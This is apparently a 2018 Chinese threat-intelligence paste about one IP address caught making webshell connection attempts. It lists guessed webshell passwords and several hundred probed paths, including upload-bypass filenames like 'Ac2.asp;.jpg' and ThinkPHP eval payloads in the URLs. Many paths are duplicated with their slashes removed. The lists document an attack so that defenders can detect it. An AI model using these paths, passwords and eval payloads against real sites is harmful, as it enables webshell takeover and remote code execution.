ShareText.Cn

GITSEC威胁情报(20180629) 103.30.41
  1. GITSEC威胁情报(20180629) 
  2. IP:103.30.41.74
  3. 情报判断:黑灰产
  4. 初始时间:
  5. 攻击手法:   webshell连接
  6. 详细攻击载荷:  
  7. webshell密码:
  8. -7
  9. mb
  10. 1
  11. a
  12. 1351
  13. jj
  14. f
  15. rmb2014
  16. Cne123
  17. sqzr
  18. red
  19. alihack
  20. fuwu
  21. xiaoliang
  22. z
  23. 110
  24. m
  25. spider
  26. omg
  27. mycak
  28. tuhao
  29. niyade
  30. 731046538
  31. pass
  32. p
  33. ysh
  34. 511348
  35. laobiao
  36. k
  37. test
  38. check_license
  39. 86
  40. c
  41. 132jb
  42. m7lrv
  43. thinkphp
  44. lemon
  45. hanyu
  46. rmb
  47. 2233
  48. page
  49. xf
  50. q
  51. tag
  52. ice
  53. 574797
  54. dxri
  55. byc
  56. adxsers
  57. z7y
  58. qx
  59. 258688
  60. diaosi
  61. zybzkz
  62. D
  63. -12
  64. caonima
  65. nimabi123
  66. 7tian
  67. guige
  68. xxoo_1234
  69. vales
  70. sos
  71. #
  72. class
  73. mybak
  74. -5
  75. aba
  76. aann
  77. sss
  78. cmd
  79. sql
  80. martin
  81. x
  82. xinsui
  83. e7xue
  84.  
  85. URI地址:
  86. //5tcssmp.php
  87. //plusbakup.hp
  88. //5tdatamp.php
  89. //plusmytag_js.php?aid=6022
  90. //Ac2.asp;.jpg
  91. //bftvp15111.asp;.jpg
  92. //jycpcx.asp;.jpg
  93. //dataconfig_data.php
  94. //imagescache.asp
  95. //kdatebaseindex_.asp
  96. //sqzr.php
  97. //Templatesred.asp
  98. //langcnsystem.php
  99. //plusservice.php
  100. //SomnusSomnus.asp
  101. //z.asp
  102. //plusav.php
  103. //plusx.php
  104. //plusspider.php
  105. //weki.asp
  106. //configAspCms_Config.asp
  107. //admin_login.php
  108. //plusmycak.php
  109. //sitemaptemplatesmetSqlIn.asp
  110. //incconfig.asp
  111. //adminerror.asp
  112. //lrrpv51331.asp;.jpg
  113. //adminAdmin_Ta.asp
  114. //admindnhxsdfg.asp
  115. //plusmytag_js.php?aid=511348
  116. //plusmytag_js.php?aid=9191
  117. //plusmytag_j.php?aid=6022
  118. //datacachefuck.php.parse_search_.inc
  119. /WebErrPage.html?aspxerrorpath=/UserFilesx.aspx
  120. //UserFilesx.aspx
  121. /
  122. //languages/zh_cn/convert/shopex49.php?license_id=assert
  123. //member/inc/good.php
  124. //info1.php
  125. //test404.php
  126. //tempplate/___index.php
  127. //include/tpllib/plus_ask.php
  128. //member/pmo.php
  129. //include/helpers/cookie.helpea.php
  130. //plus/Reg.aspx
  131. //lcwm/news.php
  132. //index.php/module/action/param1/$%7B@eval($_POST%5Bc%5D)%7D
  133. //index.php/module/action/param1/%7B$%7Beval($_POST%5Bthinkphp%5D)%7D%7D
  134. //lcwm/news.asp
  135. //plus/css_js.php
  136. //data/css_js.php
  137. //plus/ad_js.php?aid=8888
  138. //Templates/test.asp
  139. //images/good.php
  140. //templets/good.php
  141. //images/css/Thumb.asp
  142. //admin/images/Sql.asp
  143. //manage/Images/Sql.asp
  144. //admin/images/cache.asp
  145. //include/js/jquery/ui.tabs.js.php
  146. //api/cache.php
  147. //images/Sql.asp
  148. //home/cache/cachedata.end.php
  149. //install/m7lrv.php
  150. //data/img/css/xianf.ASP
  151. //bbs/utility/convert/data/config.inc.php
  152. //Include/cache.asp
  153. //dxyylc/md5.aspx
  154. //manager/include/cache.asp
  155. //dxyylc/md5.asp
  156. //plus/myjs.php
  157. //wp-content/plugins/wp-db-backup-made/cons.php
  158. //plus/top.php
  159. //plus/qingtian.php
  160. //plus/backup.php
  161. //plus/digg.php
  162. //?s=/abc/abc/abc/$%7B@print(eval($_POST[c]))%7D
  163. //admin/sdfg.asp
  164. //images/uploadfile.asp
  165. //uploadfile/userfiles/media/confg.inc.php
  166. //plus/90000.php
  167. //oa/?s=/abc/abc/abc/${@print(eval($_POST[c]))}/
  168. //?s=/abc/abc/abc/$%7B@print(eval($_POST[1]))%7D
  169. //index.php/Index/index/name/%24%7B@print%28eval%28%24_POST%5Bc%5D%29%29%7D
  170. //plus/zdqd.php
  171. //base/admin/cache.asp
  172. //plus/mytag_js.php?aid=9999
  173. //admin/Image/cache.asp
  174. //ip_adminlogin/iug_suuv.asp
  175. //plus/mp.php
  176. //install/md5.php
  177. //plus/mytag_js.php?aid=9527
  178. //plus/mytag_js.php?aid=6022
  179. //book/story_dod_hjkdsafon.php
  180. //plus/bakup.hp
  181. //5t/data/mp.php
  182. //5t/css/mp.php
  183. //config/AspCms_Config.asp
  184. //Templates/red.asp
  185. //plus/mycak.php
  186. //data/config_data.php
  187. //plus/x.php
  188. //sitemap/templates/met/SqlIn.asp
  189. //images/cache.asp
  190. //plus/spider.php
  191. //admin/error.asp
  192. //kdatebase/index_.asp
  193. //admin/Admin_Ta.asp
  194. //Somnus/Somnus.asp
  195. //inc/config.asp
  196. //data/conn/config.php
  197. //data/data/index.php
  198. //include/ckeditor/plugins/pagebreak/images/inCahe.php
  199. //images/swfupload/images/uploadye.php
  200. //admin/dnhx/sdfg.asp
  201. //utility/convert/include/rom2823.php
  202. //utility/convert/data/config.inc.php
  203. //index.php?m=formguide&c=index&a=show&formid=1&siteid=1
  204. //plus/mytag_js.php?aid=769394
  205. //include/data/fonts/uddatasql.php
  206. //include/helperss/filter.helpear.php
  207. //install/modurnlecscache.php
  208. //plus/mytag_js.php?aid=511348
  209. //plus/mytag_js.php?aid=8080
  210. //plus/mytag_js.php?aid=9191
  211. //plus/mytag_js.php?aid=9090
  212. //plus/mytag_j.php?aid=6022
  213. //templets/plus/sky.php
  214. //include/code/mp.php
  215. //data/cache/fuck.php.parse_search_.inc
  216. //plus/bakup.php
  217. //index.php/Index/dytvent/dtype/%24%7b@eval($_POST%5B'test'%5D)%7d
  218. //UserFiles/x.aspx
  219. //index.php?s=/module/action/param1/$%7B@print(eval($_POST[c]))%7D
  220. //images/qq/common.asp
  221. //plus/mybak.php
  222. //plus/90sec.php
  223. //zzz.asp;.jpg
  224. //memberpmo.php
  225. //data404test.php
  226. //includehelperscookie.helpea.php
  227. //plusReg.aspx
  228. //zx.asp
  229. //lcwmnews.php
  230. //ver.asp
  231. //11m.php
  232. //11m.asp
  233. //index.phpmoduleactionparam1$%7B@eval($_POST%5Bc%5D)%7D
  234. //index.phpmoduleactionparam1%7B$%7Beval($_POST%5Bthinkphp%5D)%7D%7D
  235. //datacss_js.php
  236. //pluscss_js.php
  237. //i.php
  238. //i.asp
  239. //plusad_js.php?aid=8888
  240. //concon.asp
  241. //imagescssThumb.asp
  242. //imagesgood.php
  243. //templetsgood.php
  244. //siteweb.asp
  245. //Templatestest.asp
  246. //adminimagesSql.asp
  247. //adminimagescache.asp
  248. //manageImagesSql.asp
  249. //includejsjqueryui.tabs.js.php
  250. //imagesSql.asp
  251. //apicache.php
  252. //md5.asp
  253. //dataimgcssxianf.ASP
  254. //myship.php
  255. //installm7lrv.php
  256. //homecachecachedata.end.php
  257. //bbsutilityconvertdataconfig.inc.php
  258. //managerincludecache.asp
  259. //dxyylcmd5.aspx
  260. //wp-contentpluginswp-db-backup-madecons.php
  261. //dxyylcmd5.asp
  262. //Includecache.asp
  263. //plustop.php
  264. //plusqingtian.php
  265. //plusdigg.php
  266. //plusmyjs.php
  267. //plusbackup.php
  268. //adminsdfg.asp
  269. //plus90000.php
  270. //?s=abcabcabc$%7B@print(eval($_POST[c]))%7D
  271. //imagesuploadfile.asp
  272. //uploadfileuserfilesmediaconfg.inc.php
  273. //oa?s=abcabcabc${@print(eval($_POST[c]))}
  274. //?s=abcabcabc$%7B@print(eval($_POST[1]))%7D
  275. //index.phpIndexindexname%24%7B@print%28eval%28%24_POST%5Bc%5D%29%29%7D
  276. //plusmytag_js.php?aid=9999
  277. //pluszdqd.php
  278. //baseadmincache.asp
  279. //adminImagecache.asp
  280. //ip_adminloginiug_suuv.asp
  281. //plusmytag_js.php?aid=9527
  282. //plusmp.php
  283. //sqzr.asp
  284. //installmd5.php
  285. //bookstory_dod_hjkdsafon.php
  286. //datas.asp
  287. //datadataindex.php
  288. //weki.php
  289. //dataconnconfig.php
  290. //utilityconvertdataconfig.inc.php
  291. //includeckeditorpluginspagebreakimagesinCahe.php
  292. //utilityconvertincluderom2823.php
  293. //imagesswfuploadimagesuploadye.php
  294. //includedatafontsuddatasql.php
  295. //installmodurnlecscache.php
  296. //includehelperssfilter.helpear.php
  297. //plusmytag_js.php?aid=8080
  298. //plusmytag_js.php?aid=9090
  299. //plusbakup.php
  300. //includecodemp.php
  301. //templetsplussky.php
  302. //xiaolei.php
  303. //pluslaobiao.php
  304. //dxyylcmd5.php
  305. //plusxsvip.php
  306. //pluse7xue.php
  307. //plusmybak.php
  308. //plus90sec.php
  309. //lcwmnews.asp
  310. /login.do
  311. /data/
  312. /housing
  313. /cms/bbwz/index_jw.jsp?siteId=1
  314. //plugins/weathermap/configs/test404.php
  315. //data/404test.php
  316. //css/css_js.php
  317. //data/s.asp
  318. //lang/cn/system.php
  319. //plus/av.php
  320. //plus/service.php
  321. //dxyylc/md5.php
  322. //plus/laobiao.php
  323. //plus/xsvip.php
  324. //plus/e7xue.php
  325. //includetpllibplus_ask.php
  326. //csscss_js.php
  327. /home/notice?aspxerrorpath=/base/admin/cache.asp
  328. /home/notice?aspxerrorpath=/plus/mytag_js.php
  329. /home/notice?aspxerrorpath=/admin/Image/cache.asp
  330. /home/notice?aspxerrorpath=/ip_adminlogin/iug_suuv.asp
  331. /home/notice?aspxerrorpath=/data/s.asp
  332. /home/notice?aspxerrorpath=/plus/bakup.hp
  333. /home/notice?aspxerrorpath=/config/AspCms_Config.asp
  334. /home/notice?aspxerrorpath=/Templates/red.asp
  335. /home/notice?aspxerrorpath=/images/cache.asp
  336. /home/notice?aspxerrorpath=/Somnus/Somnus.asp
  337. /home/notice?aspxerrorpath=/kdatebase/index_.asp
  338. /home/notice?aspxerrorpath=/admin/error.asp
  339. /home/notice?aspxerrorpath=/admin/Admin_Ta.asp
  340. /home/notice?aspxerrorpath=/inc/config.asp
  341. /home/notice?aspxerrorpath=/admin/dnhx/sdfg.asp
  342. /home/notice?aspxerrorpath=/index.php
  343. /home/notice?aspxerrorpath=/plus/mytag_j.php
  344. /home/notice?aspxerrorpath=/data/cache/fuck.php.parse_search_.inc
  345. /home/notice?aspxerrorpath=/UserFiles/x.aspx
  346. /home/notice?aspxerrorpath=/images/qq/common.asp
  347. /home/notice?aspxerrorpath=/zzz.asp;.jpg
  348. /home/notice?aspxerrorpath=/plusReg.aspx
  349. /home/notice?aspxerrorpath=/lcwmnews.asp
  350. /home/notice?aspxerrorpath=/zx.asp
  351. /home/notice?aspxerrorpath=/ver.asp
  352. /home/notice?aspxerrorpath=/11m.asp
  353. /home/notice?aspxerrorpath=/index.phpmoduleactionparam1{${eval($_POST[thinkphp])}}
  354. /home/notice?aspxerrorpath=/index.phpmoduleactionparam1${@eval($_POST[c])}
  355. /home/notice?aspxerrorpath=/i.asp
  356. /home/notice?aspxerrorpath=/concon.asp
  357. /home/notice?aspxerrorpath=/plusad_js.php
  358. /home/notice?aspxerrorpath=/Templatestest.asp
  359. /home/notice?aspxerrorpath=/siteweb.asp
  360. /home/notice?aspxerrorpath=/imagescssThumb.asp
  361. /home/notice?aspxerrorpath=/adminimagesSql.asp
  362. /home/notice?aspxerrorpath=/manageImagesSql.asp
  363. /home/notice?aspxerrorpath=/adminimagescache.asp
  364. /home/notice?aspxerrorpath=/md5.asp
  365. /home/notice?aspxerrorpath=/dataimgcssxianf.ASP
  366. /home/notice?aspxerrorpath=/managerincludecache.asp
  367. /home/notice?aspxerrorpath=/Includecache.asp
  368. /home/notice?aspxerrorpath=/dxyylcmd5.aspx
  369. /home/notice?aspxerrorpath=/dxyylcmd5.asp
  370. /home/notice?aspxerrorpath=/adminsdfg.asp
  371. /home/notice?aspxerrorpath=/imagesuploadfile.asp
  372. /home/notice?aspxerrorpath=/oa
  373. /home/notice?aspxerrorpath=/index.phpIndexindexname${@print(eval($_POST[c]))}
  374. /home/notice?aspxerrorpath=/baseadmincache.asp
  375. /home/notice?aspxerrorpath=/plusmytag_js.php
  376. /home/notice?aspxerrorpath=/adminImagecache.asp
  377. /home/notice?aspxerrorpath=/sqzr.asp
  378. /home/notice?aspxerrorpath=/ip_adminloginiug_suuv.asp
  379. /home/notice?aspxerrorpath=/datas.asp
  380. /home/notice?aspxerrorpath=/plusbakup.hp
  381. /home/notice?aspxerrorpath=/configAspCms_Config.asp
  382. /home/notice?aspxerrorpath=/Templatesred.asp
  383. /home/notice?aspxerrorpath=/sitemaptemplatesmetSqlIn.asp
  384. /home/notice?aspxerrorpath=/imagescache.asp
  385. /home/notice?aspxerrorpath=/SomnusSomnus.asp
  386. /home/notice?aspxerrorpath=/kdatebaseindex_.asp
  387. /home/notice?aspxerrorpath=/weki.asp
  388. /home/notice?aspxerrorpath=/Ac2.asp;.jpg
  389. /home/notice?aspxerrorpath=/bftvp15111.asp;.jpg
  390. /home/notice?aspxerrorpath=/jycpcx.asp;.jpg
  391. /home/notice?aspxerrorpath=/z.asp
  392. /home/notice?aspxerrorpath=/lrrpv51331.asp;.jpg
  393. /home/notice?aspxerrorpath=/adminerror.asp
  394. /home/notice?aspxerrorpath=/adminAdmin_Ta.asp
  395. /home/notice?aspxerrorpath=/incconfig.asp
  396. /home/notice?aspxerrorpath=/admindnhxsdfg.asp
  397. /home/notice?aspxerrorpath=/plusmytag_j.php
  398. /home/notice?aspxerrorpath=/datacachefuck.php.parse_search_.inc
  399. /home/notice?aspxerrorpath=/UserFilesx.aspx
  400. /?s=/abc/abc/abc/$%7B@print(eval($_POST[c]))%7D
  401. /oa/?s=/abc/abc/abc/${@print(eval($_POST[c]))}/
  402. /?s=/abc/abc/abc/$%7B@print(eval($_POST[1]))%7D
  403. /index.php/Index/index/name/${@print(eval($_POST[c]))}
  404. /base/admin/cache.asp
  405. /plus/mytag_js.php?aid=9999
  406. /admin/Image/cache.asp
  407. /ip_adminlogin/iug_suuv.asp
  408. /plus/mytag_js.php?aid=9527
  409. /data/s.asp
  410. /plus/mytag_js.php?aid=6022
  411. /plus/bakup.hp
  412. /config/AspCms_Config.asp
  413. /Templates/red.asp
  414. /sitemap/templates/met/SqlIn.asp
  415. /images/cache.asp
  416. /Somnus/Somnus.asp
  417. /kdatebase/index_.asp
  418. /admin/error.asp
  419. /admin/Admin_Ta.asp
  420. /inc/config.asp
  421. /admin/dnhx/sdfg.asp
  422. /index.php?m=formguide&c=index&a=show&formid=1&siteid=1
  423. /plus/mytag_js.php?aid=769394
  424. /plus/mytag_js.php?aid=511348
  425. /plus/mytag_js.php?aid=9191
  426. /plus/mytag_js.php?aid=8080
  427. /plus/mytag_js.php?aid=9090
  428. /plus/mytag_j.php?aid=6022
  429. /data/cache/fuck.php.parse_search_.inc
  430. /index.php/Index/dytvent/dtype/${@eval($_POST['test'])}
  431. /index.php?s=/module/action/param1/$%7B@print(eval($_POST[c]))%7D
  432. /UserFiles/x.aspx
  433. /images/qq/common.asp
  434. /plusReg.aspx
  435. /lcwmnews.asp
  436. /zx.asp
  437. /ver.asp
  438. /11m.asp
  439. /index.phpmoduleactionparam1{${eval($_POST[thinkphp])}}
  440. /index.phpmoduleactionparam1${@eval($_POST[c])}
  441. /i.asp
  442. /concon.asp
  443. /plusad_js.php?aid=8888
  444. /Templatestest.asp
  445. /siteweb.asp
  446. /adminimagesSql.asp
  447. /imagescssThumb.asp
  448. /manageImagesSql.asp
  449. /adminimagescache.asp
  450. /imagesSql.asp
  451. /md5.asp
  452. /dataimgcssxianf.ASP
  453. /managerincludecache.asp
  454. /Includecache.asp
  455. /dxyylcmd5.aspx
  456. /adminsdfg.asp
  457. /imagesuploadfile.asp
  458. /?s=abcabcabc$%7B@print(eval($_POST[c]))%7D
  459. /oa?s=abcabcabc${@print(eval($_POST[c]))}
  460. /?s=abcabcabc$%7B@print(eval($_POST[1]))%7D
  461. /index.phpIndexindexname${@print(eval($_POST[c]))}
  462. /baseadmincache.asp
  463. /plusmytag_js.php?aid=9999
  464. /adminImagecache.asp
  465. /ip_adminloginiug_suuv.asp
  466. /plusmytag_js.php?aid=9527
  467. /datas.asp
  468. /plusmytag_js.php?aid=6022
  469. /plusbakup.hp
  470. /sitemaptemplatesmetSqlIn.asp
  471. /imagescache.asp
  472. /SomnusSomnus.asp
  473. /kdatebaseindex_.asp
  474. /weki.asp
  475. /z.asp
  476. /adminerror.asp
  477. /adminAdmin_Ta.asp
  478. /configAspCms_Config.asp
  479. /plusmytag_js.php?aid=8080
  480. /plusmytag_j.php?aid=6022
  481. /plusmytag_js.php?aid=9090
  482. /datacachefuck.php.parse_search_.inc
  483. /UserFilesx.aspx
  484. /plus/mytag_js.php
  485. /plus/mytag_j.php
  486. /dxyylcmd5.php
  487. /xiaolei.php
  488. /pluslaobiao.php
  489. /plusxsvip.php
  490. /plusmybak.php
  491. /pluse7xue.php
  492. /plus90sec.php
  493.  
  494.  
  495.  
  496.  
  497.  
  498.  
  499.  
Parsed in 0.012 seconds